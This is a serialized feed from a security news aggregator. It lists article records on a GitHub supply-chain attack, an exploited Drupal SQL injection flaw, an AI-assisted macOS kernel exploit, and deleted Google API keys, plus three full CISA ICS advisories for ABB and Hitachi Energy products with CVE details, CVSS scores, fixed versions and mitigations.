Simultaneously, AI-generated pull requests are overwhelming maintainers, while AI-driven dependency selection has made the software supply chain largely automated and opaque, creating significant supply-chain security risks that require automated scanning rather than manual review.","https:\u002F\u002Fcdn.sanity.io\u002Fimages\u002Fcgdhsj6q\u002Fproduction\u002F28afd79494a5eae74cf7afee8124384497cef27a-1672x941.png?w=1000&q=95&fit=max&auto=format","2026-05-22T14:22:05.743+00:00","2026-05-22T16:00:15.424118+00:00",{"id":292,"url":293,"name":294},{"id":18,"icon":9,"name":19,"slug":20,"description":21},[328,329,330],{"id":178,"slug":180,"name":179},{"id":60,"slug":62,"name":61},{"id":183,"slug":185,"name":184},{"id":332,"title":333,"slug":334,"url":335,"summary":336,"ai_summary":337,"parent_article_id":9,"relation_type":9,"image_url":338,"verify_count":202,"avg_score":9,"score_count":202,"published_at":339,"ingested_at":340,"source":341,"category":342,"tags":343,"ioc_count":300,"has_awareness_lesson":215,"awareness_lesson_id":9},"19a1e6ec-ed96-4ada-a1eb-a6c306e33d45","5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six Hours","5-561-github-repositories-hit-by-megalodon-supply-chain-attack-in-six-hours-ae8ebc","https:\u002F\u002Fhackread.com\u002Fgithub-repositories-megalodon-supply-chain-attack\u002F","SafeDep uncovered the Megalodon attack targeting 5,561 GitHub repositories with malicious CI workflows and cloud credential theft.","SafeDep discovered Megalodon, a large-scale automated supply chain attack targeting 5,561 GitHub repositories that pushed 5,718 malicious code updates within six hours on May 18, 2026. The attackers used fake GitHub accounts and injected malicious CI\u002FCD workflows to steal cloud credentials and GitHub Actions tokens, enabling credential theft from AWS, Google Cloud, and Azure. 
The attack resulted in seven poisoned versions of the Tiledesk npm package being published publicly, demonstrating the downstream impact of compromised repositories.","https:\u002F\u002Fhackread.com\u002Fwp-content\u002Fuploads\u002F2026\u002F05\u002Fgithub-repositories-megalodon-supply-chain-attack.png","2026-05-22T13:51:21+00:00","2026-05-22T14:00:22.491648+00:00",{"id":272,"url":273,"name":274},{"id":18,"icon":9,"name":19,"slug":20,"description":21},[344,345,346],{"id":77,"slug":79,"name":78},{"id":173,"slug":175,"name":174},{"id":183,"slug":185,"name":184},{"id":348,"title":349,"slug":350,"url":351,"summary":352,"ai_summary":353,"parent_article_id":9,"relation_type":9,"image_url":354,"verify_count":202,"avg_score":9,"score_count":202,"published_at":355,"ingested_at":356,"source":357,"category":361,"tags":362,"ioc_count":214,"has_awareness_lesson":215,"awareness_lesson_id":9},"952dc02f-8cbd-4716-8491-4bd972a74c12","Drupal: Critical SQL injection flaw now targeted in attacks","drupal-critical-sql-injection-flaw-now-targeted-in-attacks-4ce8ff","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fdrupal-critical-sql-injection-flaw-now-targeted-in-attacks\u002F","Drupal is warning that hackers are attempting to exploit a \"highly critical\" SQL injection vulnerability announced earlier this week. [...]","Drupal has confirmed active exploitation of CVE-2026-9082, a critical SQL injection vulnerability in its database abstraction API affecting PostgreSQL installations. The flaw, discovered by Google\u002FMandiant researcher Michael Maturi, allows unauthenticated attackers to execute arbitrary SQL commands, potentially leading to remote code execution and data breach. 
Drupal has released patches for versions 10.4.x through 11.3.x and urges immediate upgrades.","https:\u002F\u002Fwww.bleepstatic.com\u002Fcontent\u002Fhl-images\u002F2026\u002F05\u002F22\u002Fdrupal.jpg","2026-05-22T13:14:40+00:00","2026-05-22T14:00:25.218292+00:00",{"id":358,"url":359,"name":360},"0a97efc1-021e-4aee-ae8f-b1643b35de46","https:\u002F\u002Fwww.bleepingcomputer.com\u002Ffeed\u002F","BleepingComputer",{"id":6,"icon":9,"name":7,"slug":8,"description":9},[363],{"id":12,"slug":14,"name":13},{"id":365,"title":366,"slug":367,"url":368,"summary":369,"ai_summary":370,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":371,"ingested_at":372,"source":373,"category":374,"tags":375,"ioc_count":202,"has_awareness_lesson":378,"awareness_lesson_id":379},"11693fbc-af4a-45ff-951d-6911116ee995","macOS Kernel Memory Corruption Exploit - Schneier on Security","macos-kernel-memory-corruption-exploit-schneier-on-security-b53cb4","https:\u002F\u002Fwww.schneier.com\u002Fblog\u002Farchives\u002F2026\u002F05\u002Fmacos-kernel-memory-corruption-exploit.html","A group used Anthropic&#8217;s Mythos AI model to help find a kernel memory corruption vulnerability and exploit on Apple&#8217;s M5. News article.","A research group leveraged Anthropic's Mythos AI model to identify and develop an exploit for a kernel memory corruption vulnerability affecting Apple's M5 chip architecture. The incident highlights the dual-use nature of AI-assisted security research, where advanced language models can accelerate both defensive and offensive vulnerability discovery. 
This marks a notable shift in how emerging AI capabilities are being applied to low-level system exploitation.","2026-05-21T16:03:37+00:00","2026-05-21T17:00:07.582+00:00",{"id":206,"url":207,"name":208},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[376,377],{"id":12,"slug":14,"name":13},{"id":178,"slug":180,"name":179},true,"0751b06e-a3a8-4e4b-886f-ce9cd6c78655",{"id":381,"title":382,"slug":383,"url":384,"summary":385,"ai_summary":386,"parent_article_id":9,"relation_type":9,"image_url":387,"verify_count":202,"avg_score":9,"score_count":202,"published_at":388,"ingested_at":389,"source":390,"category":391,"tags":392,"ioc_count":202,"has_awareness_lesson":378,"awareness_lesson_id":396},"cd92bee5-6752-4fad-8cf8-bc25ee36a6fb","Deleted Google API Keys Remain Active up to 23 Minutes, Study Finds","deleted-google-api-keys-remain-active-up-to-23-minutes-study-finds-3f9c32","https:\u002F\u002Fhackread.com\u002Fdeleted-google-api-keys-active-23-minutes\u002F","Deleted Google API Keys remain active for up to 23 minutes after deletion, exposing GCP, Gemini, BigQuery, and Maps data to attackers.","Aikido Security's research reveals that deleted Google API keys continue to authenticate successfully for an average of 16 minutes, with delays reaching up to 23 minutes. The delay stems from eventual consistency in Google's distributed authentication infrastructure, allowing attackers with leaked keys to access GCP, Gemini, BigQuery, and Maps APIs during the propagation window. 
Google closed the security report as \"won't fix,\" treating the delay as a known system property rather than a vulnerability.","https:\u002F\u002Fhackread.com\u002Fwp-content\u002Fuploads\u002F2026\u002F05\u002Fdeleted-google-api-keys-active-23-minutes.png","2026-05-21T16:03:12+00:00","2026-05-21T18:00:27.692374+00:00",{"id":272,"url":273,"name":274},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[393,394,395],{"id":36,"slug":38,"name":37},{"id":173,"slug":175,"name":174},{"id":183,"slug":185,"name":184},"2097d346-1c46-4ce3-bbaa-d53481570325",{"id":398,"title":399,"slug":400,"url":401,"summary":402,"ai_summary":403,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":404,"ingested_at":405,"source":406,"category":410,"tags":411,"ioc_count":280,"has_awareness_lesson":378,"awareness_lesson_id":413},"ebca1b63-bce5-4bbe-afc6-b4155c8495f6","ABB B&R Automation Runtime","abb-b-r-automation-runtime-bc2b5c","https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fics-advisories\u002Ficsa-26-141-04","View CSAF Summary An update is available that resolves a vulnerability identified by B&Rs internal security analysis in the product versions listed as affected in this advisory. An attacker who successfully exploited these vulnerabilities could take over a remote session or execute code in the context of the user’s browser session. 
The following versions of ABB B&R Automation Runtime are affected: Automation Runtime \u003C6.4, 6.4 (CVE-2025-3449, CVE-2025-3448, CVE-2025-11498) CVSS Vendor Equipment Vulnerabilities v3 6.1 B&R ABB B&R Automation Runtime Generation of Predictable Numbers or Identifiers, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Improper Neutralization of Formula Elements in a CSV File Background Critical Infrastructure Sectors: Energy Countries\u002FAreas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-3449 A Generation of Predictable Numbers or Identifiers vulnerability in the SDM component of B&R Automation Runtime versions before 6.4 may allow an unauthenticated network-based attacker to take over already established sessions. View CVE Details Affected Products ABB B&R Automation Runtime Vendor: B&R Product Version: Automation Runtime \u003C6.4 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in Automation Runtime 6.4. The System Diagnostic Manager (SDM) is disabled by default in Automation Runtime 6 and is not intended to be enabled on active systems located outside properly secured production networks or in facilities lacking adequate physical and logical access controls to prevent any form of unauthorized interaction. For customers who use SDM on their systems, B&R recommends applying the update based on risk assessment at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. 
Relevant CWE: CWE-340 Generation of Predictable Numbers or Identifiers Metrics CVSS Version Base Score Base Severity Vector String 3.1 4.2 MEDIUM CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:N\u002FUI:R\u002FS:U\u002FC:L\u002FI:L\u002FA:N\u002FE:F\u002FRL:O\u002FRC:C CVE-2025-3448 Reflected cross-site scripting (XSS) vulnerabilities exist in System Diagnostics Manager (SDM) of B&R Automation Runtime versions before 6.4 that enable a remote attacker to execute arbitrary JavaScript code in the context of the attacked user’s browser session. View CVE Details Affected Products ABB B&R Automation Runtime Vendor: B&R Product Version: Automation Runtime \u003C6.4 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in Automation Runtime 6.4. The System Diagnostic Manager (SDM) is disabled by default in Automation Runtime 6 and is not intended to be enabled on active systems located outside properly secured production networks or in facilities lacking adequate physical and logical access controls to prevent any form of unauthorized interaction. For customers who use SDM on their systems, B&R recommends applying the update based on risk assessment at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N\u002FE:F\u002FRC:C CVE-2025-11498 An Improper Neutralization of Formula Elements in a CSV File vulnerability exists in System Diagnostics Manager (SDM) of B&R Automation Runtime versions before 6.4 enabling a remote attacker to inject formula data into a generated CSV file. The exploitation of this vulnerability requires the attacker to create a malicious link. 
The user would need to click on this link, after which the resulting CSV file additionally needs to be manually opened in a spreadsheet application that evaluates formulas. View CVE Details Affected Products ABB B&R Automation Runtime Vendor: B&R Product Version: Automation Runtime \u003C6.4 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in Automation Runtime 6.4. The System Diagnostic Manager (SDM) is disabled by default in Automation Runtime 6 and is not intended to be enabled on active systems located outside properly secured production networks or in facilities lacking adequate physical and logical access controls to prevent any form of unauthorized interaction. For customers who use SDM on their systems, B&R recommends applying the update based on risk assessment at the earliest convenience. The process to install updates is described in the user manual. The step to identify the installed product version is described in the user manual. Relevant CWE: CWE-1236 Improper Neutralization of Formula Elements in a CSV File Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N\u002FRL:O\u002FRC:C Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by B&R. B&R provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall B&R or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if B&R or its suppliers have been advised of the possibility of such damages. 
This document and parts hereof must not be reproduced or copied without written permission from B&R, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Mitigating factors Do not enable the System Diagnostics Manager when it is not required. Refer to section “General security recommendations” for further advice on how to keep your system secure. Workarounds Do not use hyperlinks provided by untrusted third parties to access the SDM. Hyperlinks may be provided via: • Emails from unknown users • Social media channels • Messaging services • Webpages with comment functionality • QR Codes The use of an external Web Application Firewall (WAF) can help mitigate attacks using reflected cross-site scripting, but it is not a substitute for applying the update. Frequently asked questions What causes the vulnerabilities? The vulnerabilities are caused by insufficient input sanitization and generation of predictable numbers. What is System Diagnostics Manager (SDM)? System Diagnostics Manager (SDM) is a webpage available over the Automation Runtime Webserver, showing key diagnostic information of the running controller. What is Automation Runtime (AR)? B&R Automation Runtime is a middleware system enabling customers to run applications on B&R target systems. What might an attacker use the vulnerabilities to do? An attacker who successfully exploited these vulnerabilities could cause arbitrary code to run in the context of the user’s browser session or take over the user’s session. Since the SDM currently does not process any session-specific data and also does not implement authentication mechanisms at the session level, B&R is not aware of any advantages an attacker could gain by taking over the session ID. How could an attacker exploit the vulnerabilities? To exploit the XSS vulnerability CVE-2025-3448, an attacker could try to create a hyperlink including malicious script code. 
This hyperlink must be opened by the user to launch the attack. To exploit vulnerability CVE-2025-3449, an attacker would need to guess a user's session ID. Could the vulnerabilities be exploited remotely? Yes, an attacker who has network access to an affected system node could exploit this vulnerability. Recommended practices include that process control systems are physically protected, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed. When this security advisory was issued, had this vulnerability been publicly disclosed? No, B&R discovered the vulnerabilities through its own security analysis. When this security advisory was issued, had B&R received any reports that this vulnerability was being exploited? No, B&R had not received any information indicating that this vulnerability had been exploited when this security advisory was originally issued. Legal Notice and Terms of Use This product is provided subject to this Notification (https:\u002F\u002Fwww.cisa.gov\u002Fnotification) and this Privacy & Use policy (https:\u002F\u002Fwww.cisa.gov\u002Fprivacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and\u002For systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. 
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT SA25P003 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided \"as-is\" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2025-10-07 Date Revision Summary 2025-10-07 1 Initial version. 2025-10-14 2 Added information about CVE-2025-11498 2026-05-21 3 Initial CISA Republication of ABB PSIRT SA25P003 advisory Legal Notice and Terms of Use","ABB B&R disclosed three vulnerabilities (CVE-2025-3449, CVE-2025-3448, CVE-2025-11498) in Automation Runtime versions before 6.4 affecting the System Diagnostics Manager (SDM) component. 
The flaws enable unauthenticated attackers to hijack sessions via predictable identifiers, execute arbitrary JavaScript via reflected XSS, and inject malicious formulas into CSV files. B&R notes that SDM processes no session-specific data and implements no session-level authentication, so it is not aware of any advantage an attacker gains from session takeover; the XSS and CSV-injection issues require a victim to open an attacker-supplied link. A fix is available in Automation Runtime 6.4; SDM is disabled by default, so the issues primarily impact systems where it has been explicitly enabled.","2026-05-21T12:00:00+00:00","2026-05-21T18:00:26.736311+00:00",{"id":407,"url":408,"name":409},"6e0140fd-86c4-4e73-9d3a-a44eb754dc6b","https:\u002F\u002Fwww.cisa.gov\u002Fcybersecurity-advisories\u002Fall.xml","CISA Alerts",{"id":6,"icon":9,"name":7,"slug":8,"description":9},[412],{"id":42,"slug":44,"name":43},"77a8e7c2-c798-43a8-8c4c-73d1b28d655e",{"id":415,"title":416,"slug":417,"url":418,"summary":419,"ai_summary":420,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":404,"ingested_at":405,"source":421,"category":422,"tags":423,"ioc_count":280,"has_awareness_lesson":378,"awareness_lesson_id":425},"1fac00c0-edc1-4e72-9c90-6a663ffd88b4","ABB Terra AC Wallbox","abb-terra-ac-wallbox-f3cf9d","https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fics-advisories\u002Ficsa-26-141-05","View CSAF Summary ABB is aware of vulnerabilities in the product versions listed as affected in the advisory. An attacker who successfully exploited this vulnerability could cause the pollution of heap memory which potentially takes remote control of the product and performs a write operation to the flash memory to alter the firmware behavior. 
The following versions of ABB Terra AC Wallbox are affected: Terra AC wallbox (JP) \u003C=1.8.33, 1.8.36 (CVE-2025-10504, CVE-2025-12142, CVE-2025-12143) CVSS Vendor Equipment Vulnerabilities v3 6.1 ABB ABB Terra AC Wallbox Heap-based Buffer Overflow, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Stack-based Buffer Overflow Background Critical Infrastructure Sectors: Energy Countries\u002FAreas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2025-10504 Heap memory can be corrupted by an app that communicates with the charger over its self-defined protocol and does not strictly respect the expected field length, because the firmware does not validate that length. View CVE Details Affected Products ABB Terra AC Wallbox Vendor: ABB Product Version: ABB Terra AC wallbox (JP) \u003C=1.8.33 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product version; apply the following update depending on product variant: Terra AC wallbox (JP) 1.8.36 ABB recommends that customers apply the update at the earliest convenience. Mitigation To deliver such a message an attacker must first hijack the Bluetooth link, because the messages between the BLE app and the charger are encrypted. ABB therefore states that, in theory, the charger cannot be attacked without that prerequisite. Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1\u002FAV:A\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H\u002FE:P\u002FRL:O\u002FRC:C CVE-2025-12142 BSS memory can be corrupted by an app that communicates with the charger via Bluetooth over its self-defined protocol if the app supplies an unexpected length for binary files. 
View CVE Details Affected Products ABB Terra AC Wallbox Vendor: ABB Product Version: ABB Terra AC wallbox (JP) \u003C=1.8.33 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product version; apply the following update depending on product variant: Terra AC wallbox (JP) 1.8.36 ABB recommends that customers apply the update at the earliest convenience. Mitigation To deliver such a message an attacker must first hijack the Bluetooth link, because the messages between the BLE app and the charger are encrypted. ABB therefore states that, in theory, the charger cannot be attacked without that prerequisite. Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1\u002FAV:A\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H\u002FE:P\u002FRL:O\u002FRC:C CVE-2025-12143 Stack memory can be corrupted when a customized OCPP key “RandomDelay” is defined in the backend and an unexpected number is configured in that field. View CVE Details Affected Products ABB Terra AC Wallbox Vendor: ABB Product Version: ABB Terra AC wallbox (JP) \u003C=1.8.33 Product Status: fixed, known_affected Remediations Vendor fix The problem is corrected in the following product version; apply the following update depending on product variant: Terra AC wallbox (JP) 1.8.36 ABB recommends that customers apply the update at the earliest convenience. Mitigation To deliver such a message an attacker must first hijack the Bluetooth link, because the messages between the BLE app and the charger are encrypted. ABB therefore states that, in theory, the charger cannot be attacked without that prerequisite. 
Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1\u002FAV:A\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H\u002FE:P\u002FRL:O\u002FRC:C Acknowledgments ABB PSIRT reported these vulnerabilities to CISA. Notice The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Legal Notice and Terms of Use This product is provided subject to this Notification (https:\u002F\u002Fwww.cisa.gov\u002Fnotification) and this Privacy & Use policy (https:\u002F\u002Fwww.cisa.gov\u002Fprivacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and\u002For systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. 
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of ABB PSIRT 9AKK108471A8107 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided \"as-is\" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact ABB PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2025-09-16 Date Revision Summary 2025-09-16 1 Initial version. 
2025-09-28 2 DocumentID update 2025-09-28 3 Minor corrections 2025-10-09 4 CVSS update 2025-10-27 5 CVE update 2025-11-28 6 CVE update 2025-11-28 7 Fixed Version update 2026-05-21 8 Initial CISA Republication of ABB PSIRT 9AKK108471A8107 advisory Legal Notice and Terms of Use","ABB disclosed three memory corruption vulnerabilities (CVE-2025-10504, CVE-2025-12142, CVE-2025-12143) in the Terra AC Wallbox (JP variant) EV charger, affecting firmware versions ≤1.8.33. CVE-2025-10504 and CVE-2025-12142 allow heap and BSS memory corruption through app-to-charger protocol messages (Bluetooth) whose field or binary-file lengths the firmware does not validate; CVE-2025-12143 is a stack-based overflow triggered by an out-of-range value in a customized OCPP \"RandomDelay\" key configured from the backend. ABB's summary warns that this could lead to remote control of the device and writes to flash that alter firmware behavior. A fix is available in version 1.8.36. ABB's stated mitigation is that BLE traffic is encrypted, so an attacker must first hijack the Bluetooth link, and all three CVSS vectors assume adjacent network access with high privileges (AV:A, PR:H); note that the same Bluetooth mitigation is listed for the OCPP-backend issue, where its applicability is unclear.",{"id":407,"url":408,"name":409},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[424],{"id":42,"slug":44,"name":43},"850388e7-0c81-4fe1-8cf9-861a3c7aebda",{"id":427,"title":428,"slug":429,"url":430,"summary":431,"ai_summary":432,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":404,"ingested_at":405,"source":433,"category":434,"tags":435,"ioc_count":214,"has_awareness_lesson":378,"awareness_lesson_id":439},"e3a6e55a-7d15-4999-9554-0ccce67f8b71","Hitachi Energy GMS600","hitachi-energy-gms600-6701cd","https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Fics-advisories\u002Ficsa-26-141-01","View CSAF Summary Hitachi Energy is aware of the vulnerability, CVE-2022-4304 in the OSS component OpenSSL, that affects the GMS600 versions that are listed below. An attacker successfully exploiting this vulnerability could send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection. 
For immediate mitigation \u002Fworkaround information, please refer to the General Mitigation Factors\u002FWorkarounds The following versions of Hitachi Energy GMS600 are affected: GMS600 vers:GMS600\u002F>=1.3.0|\u003C=1.3.1 (CVE-2022-4304) CVSS Vendor Equipment Vulnerabilities v3 5.9 Hitachi Energy Hitachi Energy GMS600 Observable Discrepancy Background Critical Infrastructure Sectors: Critical Manufacturing Countries\u002FAreas Deployed: Worldwide Company Headquarters Location: Switzerland Vulnerabilities Expand All + CVE-2022-4304 A timing-based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection. 
View CVE Details Affected Products Hitachi Energy GMS600 Vendor: Hitachi Energy Product Version: GMS600 versions 1.3.0 and 1.3.1 Product Status: known_affected Remediations Vendor fix Upgrade to version 1.3.2 Relevant CWE: CWE-203 Observable Discrepancy Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N Acknowledgments Hitachi Energy Internal Team reported this vulnerability to CISA Notice The information in this document is subject to change without notice and should not be construed as a commitment by Hitachi Energy. Hitachi Energy provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall Hitachi Energy or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if Hitachi Energy or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from Hitachi Energy and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners. Support For additional information and support please contact your product provider or Hitachi Energy service organization. For contact information, see https:\u002F\u002Fwww.hitachienergy.com\u002Fcontact-us\u002F for Hitachi Energy contact-centers. 
General Mitigation Factors Recommended security practices and firewall configurations such as enforcing ingress IP allowlisting and applying traffic rate limiting in accordance with the operational security policy can help protect a process control network from attacks that originate from outside the network. Such practices include that process control systems are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that have to be evaluated case by case. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. SSVC SSVCv2\u002FE:N\u002FA:Y\u002F2026-04-22T13:37:14Z\u002F Legal Notice and Terms of Use This product is provided subject to this Notification (https:\u002F\u002Fwww.cisa.gov\u002Fnotification) and this Privacy & Use policy (https:\u002F\u002Fwww.cisa.gov\u002Fprivacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and\u002For systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. 
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Hitachi Energy PSIRT 8DBD000159 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided \"as-is\" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Hitachi Energy PSIRT directly for any questions regarding this advisory. Revision History Initial Release Date: 2023-06-27 Date Revision Summary 2023-06-27 1 Initial public release. 2026-04-28 2 Updated fixed version. 2026-05-21 3 Initial CISA Republication of Hitachi Energy PSIRT 8DBD000159 advisory Legal Notice and Terms of Use","Hitachi Energy GMS600 grid management system versions 1.3.0 and 1.3.1 are affected by CVE-2022-4304, a timing-based side-channel vulnerability in OpenSSL's RSA decryption implementation. 
An attacker with network access who has observed a genuine connection and can send a sufficiently large number of trial decryption messages while timing the responses could recover the pre-master secret and decrypt the TLS application data of that connection in a Bleichenbacher-style attack. Hitachi Energy recommends an immediate upgrade to version 1.3.2.
